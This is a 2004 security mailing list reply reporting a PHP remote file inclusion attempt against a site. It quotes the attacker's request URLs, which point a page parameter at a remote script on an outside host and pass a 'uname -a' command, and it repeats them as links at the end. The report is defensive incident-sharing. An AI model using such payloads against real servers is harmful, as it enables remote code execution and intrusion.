Security Incidents mailing list archives
Re: PHP injection attempt from 200.222.244.154
From: Kirby Angell <kangell () alertra com>
Date: Mon, 22 Nov 2004 20:09:22 -0600
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Haha... note to self, do not include the actual attack URL in the message. Judging from this referer: Referer: http://gmail.google.com/gmail?view=cv&search=inbox&th=10063111e32eb17b&lvp=-1&cvp=0&zx=18acabd2b173f0d8528652499 I'd say someone got my message from this list and then clicked on the URLs :-) Kirby Angell wrote: ...> | The attacker IP made 4 attempts to exploit a common coding error found | in PHP applications. The flaw involves injecting a malicious URL into a | variable that the given PHP page later uses in an 'include' statement. | In all attempts, the given page was not susceptible to the attack and | therefore a 302 Not Found error was returned. | | In the first attempt, the attacker tried: | | http://[domain]/uptime3?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a | | | The rest of the attempts the attacker tried: | | http://[domain]/uptime.php?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a | ... (I edited them out this time) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFBopvS21unUZAE9MARAmb0AJ9bxXgRZE7w2VLzECmwhCXr0dE2ewCeO3La DrJM5PIDq+0NM2xN6pC6Bak= =dj/a -----END PGP SIGNATURE-----
![http://[domain]/uptime3?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a](http://[domain]/uptime3?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a){kind=link}
![http://[domain]/uptime.php?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a](http://[domain]/uptime.php?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a){kind=link}
Current thread:
- PHP injection attempt from 200.222.244.154 Kirby Angell (Nov 22)
- RE: PHP injection attempt from 200.222.244.154 KEM Hosting (Nov 23)
- Re: PHP injection attempt from 200.222.244.154 Kirby Angell (Nov 24)